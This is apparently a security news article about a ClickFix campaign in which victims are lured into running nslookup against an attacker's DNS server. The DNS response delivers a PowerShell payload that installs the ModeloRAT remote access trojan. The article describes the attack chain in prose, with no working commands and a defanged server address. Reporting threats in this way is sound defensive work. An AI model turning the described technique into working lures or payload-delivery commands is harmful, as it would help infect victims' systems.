New ClickFix Attack Exploits nslookup to Fetch PowerShell Payload via DNS Queries

Post Views: 7

ClickFix Social Engineering Attack Evolves with DNS Queries

A new variant of the ClickFix social engineering attack has emerged, leveraging DNS queries to deliver malware payloads. This novel technique marks the first known instance of DNS being used as a channel in these campaigns.

Typical ClickFix Attacks

Typically, ClickFix attacks deceive users into executing malicious commands under the guise of fixing errors, installing updates, or enabling functionality.

New Variant

However, in this latest variant, an attacker-controlled DNS server delivers the second-stage payload via DNS lookups.

The attack begins with the victim being instructed to run a command using the nslookup tool, which queries the attacker-controlled DNS server instead of the system’s default DNS server.

The command returns a query containing a malicious PowerShell script, which is then executed on the device to install malware.

Researchers at Microsoft observed this new evasion approach, where attackers use a custom DNS lookup to receive the next-stage payload for execution.

The command is executed in the Windows Run dialog box, issuing a DNS lookup for the hostname “example.com” against the threat actor’s DNS server at 84[.]21.189[.]20.

The DNS response contains a “NAME:” field with the second PowerShell payload, which is executed on the device.

This payload establishes persistence by creating a VBScript file and a shortcut to launch the file on startup.

The final payload is a remote access trojan known as ModeloRAT, allowing attackers to control compromised systems remotely.

Evolution of ClickFix Attacks

This technique allows attackers to modify payloads on the fly while blending in with normal DNS traffic.

ClickFix attacks have rapidly evolved over the past year, with threat actors experimenting with new delivery tactics and payload types targeting various operating systems.

Previous ClickFix campaigns relied on convincing users to execute PowerShell or shell commands directly on their operating systems to install malware.

However, recent campaigns have expanded their techniques beyond traditional malware payload delivery over the web.

For instance, a recent ClickFix attack called “ConsentFix” abuses the Azure CLI OAuth app to hijack Microsoft accounts without a password and bypass multi-factor authentication.

Conclusion

The use of DNS as a communication and staging channel in this latest ClickFix variant highlights the evolving nature of these attacks.

As threat actors continue to experiment with new techniques, it is essential for organizations to remain vigilant and implement robust security measures to prevent these types of attacks.